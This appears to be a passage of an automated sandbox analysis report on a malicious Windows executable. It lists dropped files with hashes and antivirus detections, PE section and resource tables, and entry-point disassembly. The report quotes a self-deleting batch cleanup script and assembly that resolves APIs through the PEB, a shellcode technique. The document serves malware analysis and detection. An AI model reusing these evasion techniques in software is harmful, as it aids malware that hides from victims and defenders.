                                                                                                                                                                                                                        SSDEEP:3:jdKZON+E2J5xAIbnsMD2UN+E2J5xAIbnaKReJsjIdKZON+E2J5xAI8XGKEhovn:jdKoN723fgMD2UN723fe/dKoN723fLyn
                                                                                                                                                                                                                        MD5:764F0F8C5915F754449D4F7DAC03B8BA
                                                                                                                                                                                                                        SHA1:7E9EC3BB1E75EB1850D3A99C0F232D5EF4803373
                                                                                                                                                                                                                        SHA-256:B9657435668B56EE72C37F00312B374ED5BD5A3C7BAD7381AD57370B2855601B
                                                                                                                                                                                                                        SHA-512:F367913900A3C6126946051CDD72B1AD2F31416679EB14D793F11045F9CC161EC78838048908C0D97EA83A3522DC2A20D86752DC5F76DC28E40B9C20DED75EA8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\XBVdJN.exe"..if exist "C:\Users\user\AppData\Local\Temp\XBVdJN.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\05c412c7.bat"..
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):196
                                                                                                                                                                                                                        Entropy (8bit):4.993340827293472
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:jdKoN723fgMD2UN723fe/dKoN723fh19nn:jIMada2/IMa5fn
                                                                                                                                                                                                                        MD5:383C01B3C3122770D7D993E21D4FACBC
                                                                                                                                                                                                                        SHA1:A4B7CA52FB7CBB2037C824CE8DC4B453E25E03F4
                                                                                                                                                                                                                        SHA-256:3D56D522897A6163485117E290CCB8A46502F691CDD6B26038BFA81830258B63
                                                                                                                                                                                                                        SHA-512:A2A5A1329D86780366A7F658199DA6FF9EDE4CF26CCE100E75E9D75C6D2CE37D40050AFA9A81477553F0A56876C0E6A71DBF100421E36DDA0D5B63D43433D2D8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview::DELFILE..del "C:\Users\user\AppData\Local\Temp\XBVdJN.exe"..if exist "C:\Users\user\AppData\Local\Temp\XBVdJN.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\55fb1e02.bat"..
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                        Entropy (8bit):1.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nv:9
                                                                                                                                                                                                                        MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                                                                                                                                        SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                                                                                                                                        SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                                                                                                                                        SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:foo.
                                                                                                                                                                                                                        Process:C:\Windows\94000696690303050\winsvcs.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):479744
                                                                                                                                                                                                                        Entropy (8bit):6.71960078405057
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
                                                                                                                                                                                                                        MD5:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        SHA1:658F27FF1CCC2B57EEAAF98AB469276EFE9C8C51
                                                                                                                                                                                                                        SHA-256:5E174F9E0B7B914A4717ABC076AC00B3976E7A9A4ABCE6CA4170C8F267624C3C
                                                                                                                                                                                                                        SHA-512:B8D4B406F8AEB611CB09E3961FA7C40128A9D5360B86DF149DAD115DE80951B2DF201D4963CE498CDA5E3D8768574415428C1087FC56FE632A281DBFCC8E7B96
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;..........................PE..L......\..........................................@.........................................................................P?...........)...................0..tD...................................................................................text...9d.......f.................. ..`.text1...............j.............. ..`.rdata..n............l..............@..@.data....v...`...F...6..............@....data1...............|..............@....trace..t...........................@..@.rsrc....).......*..................@..@.reloc...T...0...V..................@..B.1...uD..P.......B.................. ...........................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15872
                                                                                                                                                                                                                        Entropy (8bit):7.031075575407894
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                                                                                                                                                                                                        MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                                                                                                                                                                                                        SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                                                                                                                                                                                                        SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                                                                                                                                                                                                        SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_293.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_296.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_301.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_309.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_303.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_302.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_307.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_308.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_315.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        • Filename: LisectAVT_2403002B_324.exe, Detection: malicious, Browse
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\LisectAVT_2403002B_290.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):479744
                                                                                                                                                                                                                        Entropy (8bit):6.71960078405057
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
                                                                                                                                                                                                                        MD5:8DA4D99EBBA9A59FA372EEFD2556860C
                                                                                                                                                                                                                        SHA1:658F27FF1CCC2B57EEAAF98AB469276EFE9C8C51
                                                                                                                                                                                                                        SHA-256:5E174F9E0B7B914A4717ABC076AC00B3976E7A9A4ABCE6CA4170C8F267624C3C
                                                                                                                                                                                                                        SHA-512:B8D4B406F8AEB611CB09E3961FA7C40128A9D5360B86DF149DAD115DE80951B2DF201D4963CE498CDA5E3D8768574415428C1087FC56FE632A281DBFCC8E7B96
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;..........................PE..L......\..........................................@.........................................................................P?...........)...................0..tD...................................................................................text...9d.......f.................. ..`.text1...............j.............. ..`.rdata..n............l..............@..@.data....v...`...F...6..............@....data1...............|..............@....trace..t...........................@..@.rsrc....).......*..................@..@.reloc...T...0...V..................@..B.1...uD..P.......B.................. ...........................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                        Entropy (8bit):4.4689837004358575
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6144:YzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNsjDH5SC0:OZHtBZWOKnMM6bFpej4
                                                                                                                                                                                                                        MD5:DECCE6BC91A5A8E5FD99234BDB9033B6
                                                                                                                                                                                                                        SHA1:92C9FC065BC73E48881D3F8E22F6DBDE5327E1D4
                                                                                                                                                                                                                        SHA-256:A164BEF62623689FAD31D2725171005006170B47E1938E5EC9CB6C26FD72CE26
                                                                                                                                                                                                                        SHA-512:B97890E13504B3A0B7A117C33E5E55E47AFE2C04AAE66AD531DC9AF31224D42728191C6CD3E949C2173CC9725FDCAAF26FD4EBF36F36F0CDAF72868AF4742BC5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..j.................................................................................................................................................................................................................................................................................................................................................g.^........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.71960078405057
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:LisectAVT_2403002B_290.exe
                                                                                                                                                                                                                        File size:479'744 bytes
                                                                                                                                                                                                                        MD5:8da4d99ebba9a59fa372eefd2556860c
                                                                                                                                                                                                                        SHA1:658f27ff1ccc2b57eeaaf98ab469276efe9c8c51
                                                                                                                                                                                                                        SHA256:5e174f9e0b7b914a4717abc076ac00b3976e7a9a4abce6ca4170c8f267624c3c
                                                                                                                                                                                                                        SHA512:b8d4b406f8aeb611cb09e3961fa7c40128a9d5360b86df149dad115de80951b2df201d4963ce498cda5e3d8768574415428c1087fc56fe632a281dbfcc8e7b96
                                                                                                                                                                                                                        SSDEEP:12288:1TEbau3khjJxZcroZpy7XbEVaEb0mmYIwGde9PZGQm+k:1wuu3khjJxZcroZpyuAYIPde7G
                                                                                                                                                                                                                        TLSH:ECA48C0173D0D573E8D1087B0F77E793A63E2F807E64A997AF900A5DB92166198F630E
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ZcI.;...;...;....p..;...C...;...C...;...C...;....`..;....v..;...;...:...;...;...i...;...C...;..Rich.;.........................
                                                                                                                                                                                                                        Icon Hash:0f31498c88c96107
                                                                                                                                                                                                                        Entrypoint:0x479000
                                                                                                                                                                                                                        Entrypoint Section:1uD
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x5C01C09C [Fri Nov 30 22:58:36 2018 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:ecadb88ceebd0340f47ade94f24af148
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        sub esp, 0000016Ch
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        mov dword ptr [ebp-24h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-08h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-20h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-18h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-48h], 64564258h
                                                                                                                                                                                                                        mov dword ptr [ebp-44h], 652E4E4Ah
                                                                                                                                                                                                                        mov dword ptr [ebp-40h], 00006578h
                                                                                                                                                                                                                        mov dword ptr [ebp-3Ch], 00000000h
                                                                                                                                                                                                                        call 00007FF8F4B58AA5h
                                                                                                                                                                                                                        pop eax
                                                                                                                                                                                                                        add eax, 00000225h
                                                                                                                                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                        mov eax, dword ptr fs:[00000030h]
                                                                                                                                                                                                                        mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                        mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                        mov dword ptr [eax], E904C483h
                                                                                                                                                                                                                        mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                        mov dword ptr [eax+04h], FFFADB8Bh
                                                                                                                                                                                                                        mov eax, dword ptr [ebp-28h]
                                                                                                                                                                                                                        mov eax, dword ptr [eax+0Ch]
                                                                                                                                                                                                                        mov eax, dword ptr [eax+1Ch]
                                                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                                                        mov eax, dword ptr [eax+08h]
                                                                                                                                                                                                                        mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                        mov ecx, dword ptr [ecx+eax+78h]
                                                                                                                                                                                                                        add ecx, eax
                                                                                                                                                                                                                        mov edi, dword ptr [ecx+1Ch]
                                                                                                                                                                                                                        mov ebx, dword ptr [ecx+20h]
                                                                                                                                                                                                                        mov esi, dword ptr [ecx+24h]
                                                                                                                                                                                                                        mov ecx, dword ptr [ecx+18h]
                                                                                                                                                                                                                        add esi, eax
                                                                                                                                                                                                                        add edi, eax
                                                                                                                                                                                                                        add ebx, eax
                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                        mov dword ptr [ebp-30h], esi
                                                                                                                                                                                                                        mov dword ptr [ebp-1Ch], edx
                                                                                                                                                                                                                        mov dword ptr [ebp-34h], ecx
                                                                                                                                                                                                                        cmp edx, dword ptr [ebp-34h]
                                                                                                                                                                                                                        jnc 00007FF8F4B58BEEh
                                                                                                                                                                                                                        movzx ecx, word ptr [esi+edx*2]
                                                                                                                                                                                                                        mov edx, dword ptr [ebx+edx*4]
                                                                                                                                                                                                                        mov esi, dword ptr [edi+ecx*4]
                                                                                                                                                                                                                        add edx, eax
                                                                                                                                                                                                                        mov ecx, dword ptr [edx]
                                                                                                                                                                                                                        add esi, eax
                                                                                                                                                                                                                        cmp ecx, 4D746547h
                                                                                                                                                                                                                        jne 00007FF8F4B58AF4h
                                                                                                                                                                                                                        cmp dword ptr [edx+04h], 6C75646Fh
                                                                                                                                                                                                                        jne 00007FF8F4B58AEBh
                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [ASM] VS2005 build 50727
                                                                                                                                                                                                                        • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                        • [ C ] VS2005 build 50727
                                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                                        • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x43f500x118.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x2299c.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x730000x4474.reloc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x390000x4d4.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x364390x3660063673ef1b4151d7bc0cd02013f23be05False0.46641073994252874Matlab v4 mat-file (little endian) \344\200VWS\270tw, numeric, rows 0, columns 06.497178211047947IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .text10x380000x900x200517045174f9f901ac4e4da530e56bd7bFalse0.26171875data2.0224887435167753IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x390000xc96e0xca00263190584a1bc5fb150d4a2460c8eff9False0.5509359529702971data6.243837129142952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x460000x76e80x46004e70c9268238f7516c412f16458b05a9False0.25948660714285715data3.713935824019731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .data10x4e0000xbb80xc0072d754e129ede668e69798f49ebbe2c3False0.4391276041666667data4.119554788577961IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .trace0x4f0000x7740x8004746bd2da2f4ecf9897856bb55e4e532False0.46044921875data5.57633689464484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rsrc0x500000x2299c0x22a00aec849dcf06b26e88fdedaf5af076757False0.5493922044223827data6.8128172215502705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .reloc0x730000x54f60x560070210ed0d9b50a506ae4860de94a4773False0.583984375data5.990776825683021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        1uD0x790000x50000x420097528d061fa1166710c7e3d2761cf6c5False0.7774621212121212data6.934614473647855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RCDATA0x506880xb68cdataEnglishUnited States0.988145168193101
                                                                                                                                                                                                                        RCDATA0x5bd140x1b42dataEnglishUnited States1.0015763829177415
                                                                                                                                                                                                                        RT_BITMAP0x5d8580x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                                                                                                                        RT_BITMAP0x5da280x428Device independent bitmap graphic, 16 x 16 x 32, image size 1024EnglishUnited States0.2161654135338346
                                                                                                                                                                                                                        RT_BITMAP0x5de500x98Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colorsEnglishUnited States0.506578947368421
                                                                                                                                                                                                                        RT_ICON0x5dee80x1131PNG image data, 256 x 256, 8-bit/color RGB, non-interlacedEnglishUnited States0.985912292660759
                                                                                                                                                                                                                        RT_ICON0x5f01c0x5488Device independent bitmap graphic, 72 x 144 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.16926987060998153
                                                                                                                                                                                                                        RT_ICON0x644a40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.17530703826169108
                                                                                                                                                                                                                        RT_ICON0x686cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.2341286307053942
                                                                                                                                                                                                                        RT_ICON0x6ac740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0, resolution 11811 x 11811 px/mEnglishUnited States0.3079268292682927
